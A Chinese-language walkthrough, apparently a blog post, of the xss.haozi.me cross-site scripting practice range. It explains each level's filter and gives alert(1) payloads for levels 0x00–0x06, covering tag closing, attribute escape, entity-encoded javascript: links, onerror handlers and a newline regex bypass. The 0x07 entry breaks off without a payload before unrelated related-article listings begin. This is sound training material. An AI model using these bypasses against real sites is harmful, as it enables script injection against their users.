xss.haozi.me靶场通关参考

url:https://xss.haozi.me/

文章目录

    • 0x00
    • 0x01
    • 0x02
    • 0x03
    • 0x04
    • 0x05
    • 0x06
    • 0x07
    • 0x08
    • 0x09
    • 0x0A
    • 0x0B
    • 0x0C
    • 00xD
    • 00xE
    • 00xF
    • 0x10
    • 0x11
    • 0x12

0x00

先看js代码,第一关给你热热手,没给你加过


payload:

<script>alert(1)</script>

0x01

在这里插入图片描述
这关给你限制了把你输入的js代码变成文本格式执行不了,我们把前后两个标签闭合了就能绕过
payload:

</textarea><script>alert(1)</script><textarea>

0x02

在这里插入图片描述
从js代码来看,逃逸掉vaule属性就可以,这里随便用个触发事件都可以
payload:

1"><script>alert(1)</script>

0x03

在这里插入图片描述
这关就已经开始用正则表达式来过滤一些符号了,这关过滤掉了(),过滤掉了()也就代表着不能用alert(1)来触发了,但是我们可以试着用html编码把()编码尝试,发现寄不行,因为js不会解码。

我们这时候可以用a标签来进行编码绕过,为什么a标签可以?因为a标签中的href解码顺序为 html,url,JavaScript。所以我们在a标签中编码,html编码已经被解码成功了,成功生成了()。同理使用url编解码也可以成功生成()
payload:

<a href="javascript:alert&#40;1&#41;">0x03</a>

0x04

在这里插入图片描述
同第三关,只是多过滤了一个反引号`
payload:

<a href="javascript:alert&#40;1&#41;">0x04</a>

0x05

在这里插入图片描述
挺离谱的,给你把–>换成笑脸的表情,这可能是作者的小趣味(0v0),把–>过滤意思就是说不想让你用注释来扰,但是同样我们可以直接逃逸掉这个
payload:

**--!><img src=x onerror=alert(1)

0x06

在这里插入图片描述
这关正则的意思是,不让你用auto或者on开头,而且是以=结尾的字符串。我们直接换行可以绕过
payload:

onmouseover
=
alert(1)

0x07

在这里插入图片描述
本关对</>进行了过滤,不让我们闭合

标签,但是如果各位学过一点点的html知识就会知道,html对格式要求不是很严格,有时候你甚至不用闭合他都可以执行内容,这里我们可以利用这点来尝试。
payload:

本文来自互联网用户投稿,该文观点仅代表作者本人,不代表本站立场。本站仅提供信息存储空间服务,不拥有所有权,不承担相关法律责任。如若转载,请注明出处:http://www.mzph.cn/news/857942.shtml

如若内容造成侵权/违法违规/事实不符,请联系多彩编程网进行投诉反馈email:809451989@qq.com,一经查实,立即删除!

相关文章

【大数据】—量化交易实战案例(基础策略)

【大数据】—量化交易实战案例(基础策略)

声明&#xff1a;股市有风险&#xff0c;投资需谨慎&#xff01;本人没有系统学过金融知识&#xff0c;对股票有敬畏之心没有踏入其大门&#xff0c;所以只能写本文来模拟炒股。 量化交易&#xff0c;也被称为算法交易&#xff0c;是一种使用数学模型和计算机算法来分析市场数…
阅读更多...
CronTrigger总结

CronTrigger总结

CronTrigger总结 大家好&#xff0c;我是免费搭建查券返利机器人省钱赚佣金就用微赚淘客系统3.0的小编&#xff0c;也是冬天不穿秋裤&#xff0c;天冷也要风度的程序猿&#xff01; 1. CronTrigger概述 CronTrigger是Quartz调度框架中的一种触发器类型&#xff0c;用于基于Cr…
阅读更多...
计组--信息编码和数据表示and运算方法运算器(复习专用)

计组--信息编码和数据表示and运算方法运算器(复习专用)

文章目录 前言一、数值的格式二、定点机器数的表示方式1.原码表示法&#xff1a;2.补码表示法:3.反码表示法&#xff1a;4.移码表示法&#xff1a; 三、浮点机器数的表示方式(规格化)四、定点数的加减乘除运算五、定点运算器的组成与结构六、浮点运算总结 前言 学无止境&#…
阅读更多...
FlinkCDC pipeline模式 mysql-to-paimon.yaml

FlinkCDC pipeline模式 mysql-to-paimon.yaml

flinkcdc 需要引入&#xff1a; source端&#xff1a; flink-cdc-pipeline-connector-mysql-xxx.jar、mysql-connector-java-xxx.jar、 sink端&#xff1a; flink-cdc-pipeline-connector-paimon-xxx.jar flinkcdc官方提供connect包下载地址&#xff0c;pipeline模式提交作业和…
阅读更多...
Python 函数注解,给函数贴上小标签

Python 函数注解,给函数贴上小标签

目录 什么是函数注解? 为什么使用函数注解? 如何编写函数注解? 实战演练 与类型提示(Type Hints)的关系 类型安全的运算器 什么是函数注解? 函数注解(Function Annotations)是Python 3中新增的一个特性,它允许为函数的参数和返回值指定类型。 这些注解不会改变…
阅读更多...
Paimon Trino Presto的关系 分布式查询引擎

Paimon Trino Presto的关系 分布式查询引擎

Paimon支持的引擎兼容性矩阵&#xff1a; Trino 是 Presto 同项目的不同版本&#xff0c;是原Faceboo Presto创始人团队核心开发和维护人员分离出来后开发和维护的分支&#xff0c;Trino基于Presto&#xff0c;目前 Trino 和 Presto 都仍在继续开发和维护。 参考&#xff1a;
阅读更多...
win10 安装openssl并使用openssl创建自签名证书

win10 安装openssl并使用openssl创建自签名证书

win10创建自签名证书 下载安装配置openssl 下载地址&#xff1a; https://slproweb.com/download/Win64OpenSSL-3_3_1.exe https://slproweb.com/products/Win32OpenSSL.html 完成后安装&#xff0c;一路next&#xff0c;到达选位置的之后选择安装的位置&#xff0c;我这里选…
阅读更多...
已成功见刊检索的国际学术会议论文海报展示(2)

已成功见刊检索的国际学术会议论文海报展示(2)

【先投稿先送审】第四届计算机、物联网与控制工程国际学术会议&#xff08;CITCE 2024) 大会官网&#xff1a;www.citce.org 时间地点&#xff1a;2024年11月1-3日&#xff0c;中国-武汉 收录检索&#xff1a;EI Compendex&#xff0c;Scopus 主办单位&#xff1a;四川师范…
阅读更多...
计算机组成原理 —— 存储系统(主存储器基本组成)

计算机组成原理 —— 存储系统(主存储器基本组成)

计算机组成原理 —— 存储系统&#xff08;主存储器基本组成&#xff09; 0和1的硬件表示整合结构寻址按字寻址和按字节寻址按字寻址按字节寻址区别总结 字寻址到字节寻址转化 我们今天来看一下主存储器的基本组成&#xff1a; 0和1的硬件表示 我们知道一个主存储器是由存储体…
阅读更多...
C++ | Leetcode C++题解之第174题地下城游戏

C++ | Leetcode C++题解之第174题地下城游戏

题目&#xff1a; 题解&#xff1a; class Solution { public:int calculateMinimumHP(vector<vector<int>>& dungeon) {int n dungeon.size(), m dungeon[0].size();vector<vector<int>> dp(n 1, vector<int>(m 1, INT_MAX));dp[n][m …
阅读更多...
基于状态机与时间片轮的51单片机电子钟设计 程序Proteus仿真

基于状态机与时间片轮的51单片机电子钟设计 程序Proteus仿真

在对分层思想、时间片轮转和状态机思想进行[简单应用] ## 二、主函数 主函数如下&#xff1a; 整个主函数的中心任务为功能选择切换任务&#xff0c;负责切换显示内容&#xff0c;控制ui变化等&#xff0c;其余任务函数除提醒任务外都是通过全局变量的形式给功能选择切换任务提…
阅读更多...
MongoDB Map-Reduce 简介

MongoDB Map-Reduce 简介

MongoDB Map-Reduce 简介 MongoDB 是一个流行的 NoSQL 数据库,它使用文档存储数据,这些数据以 JSON 格式存储。MongoDB 提供了多种数据处理方法,其中 Map-Reduce 是一种用于批量处理和聚合数据的功能强大的工具。Map-Reduce 允许用户对大量数据进行自定义的聚合操作,适用于…
阅读更多...
【大数据 复习】第7章 MapReduce(重中之重)

【大数据 复习】第7章 MapReduce(重中之重)

一、概念 1.MapReduce 设计就是“计算向数据靠拢”&#xff0c;而不是“数据向计算靠拢”&#xff0c;因为移动&#xff0c;数据需要大量的网络传输开销。 2.Hadoop MapReduce是分布式并行编程模型MapReduce的开源实现。 3.特点 &#xff08;1&#xff09;非共享式&#xff0c;…
阅读更多...
MySQL学习笔记-进阶篇-视图和存储过程

MySQL学习笔记-进阶篇-视图和存储过程

四、视图和存储过程 视图 存储过程 基本语法 创建 CREATE PROCEDURE ([参数列表]) BEGIN --SQL END; 调用 CALL 存储过程名&#xff08;[参数列表]&#xff09; 查看 --查看指定数据库的存储过程及状态信息 SELECT * FROM INFORMATION_SCHEMA.ROUTINES WHERE ROUTINE_SHCEMA…
阅读更多...
构建高可用Java微服务架构的秘籍

构建高可用Java微服务架构的秘籍

构建高可用Java微服务架构的秘籍 大家好&#xff0c;我是免费搭建查券返利机器人省钱赚佣金就用微赚淘客系统3.0的小编&#xff0c;也是冬天不穿秋裤&#xff0c;天冷也要风度的程序猿&#xff01; 随着云计算和分布式系统的快速发展&#xff0c;微服务架构已成为构建大型应用…
阅读更多...
indexedDB---掌握浏览器内建数据库的基本用法

indexedDB---掌握浏览器内建数据库的基本用法

1.认识indexedDB IndexedDB 是一个浏览器内建的数据库&#xff0c;它可以存放对象格式的数据&#xff0c;类似本地存储localstore&#xff0c;但是相比localStore 10MB的存储量&#xff0c;indexedDB可存储的数据量远超过这个数值&#xff0c;具体是多少呢&#xff1f; 默认情…
阅读更多...
【软件设计】详细设计说明书(word原件,项目直接套用)

【软件设计】详细设计说明书(word原件,项目直接套用)

软件详细设计说明书 1.系统总体设计 2.性能设计 3.系统功能模块详细设计 4.数据库设计 5.接口设计 6.系统出错处理设计 7.系统处理规定 软件全套资料&#xff1a;本文末个人名片直接获取或者进主页。
阅读更多...
C语言笔试题:实现把一个无符号整型数字的二进制序列反序后输出

C语言笔试题:实现把一个无符号整型数字的二进制序列反序后输出

目录 题目 实例 方法一&#xff1a;直接交换 方法二&#xff1a;间接交换 拓展 题目 编写一个函数&#xff0c;将一个无符号整数的所有位逆序&#xff08;在32位机器下&#xff09; 实例 例如有一个无符号整数 unsigned int num 32; unsigned int 在32位系统中占4个字…
阅读更多...
Selenium - 翻页(常用代码)

Selenium - 翻页(常用代码)

文章目录 本文基于 macOS 10.15.7 | selenium - Version: 4.21.0 | Python 3.11.5 import time import os import sys from selenium import webdriver from selenium.webdriver.common.by import Bylist_path list.txtdef next_page(driver):# 示例&#xff1a;获取页面列表…
阅读更多...
python从入门到精通10:字符串遍历

python从入门到精通10:字符串遍历

在Python中&#xff0c;字符串遍历是一个常见的操作&#xff0c;它允许我们逐个访问字符串中的每个字符。下面将详细讲解Python字符串遍历的几种方式&#xff0c;并结合示例代码进行说明。 1. 使用for…in循环遍历字符串 for…in循环是Python中最常用的遍历字符串的方式。这种…
阅读更多...
最新文章

Copyright @ 2022~2023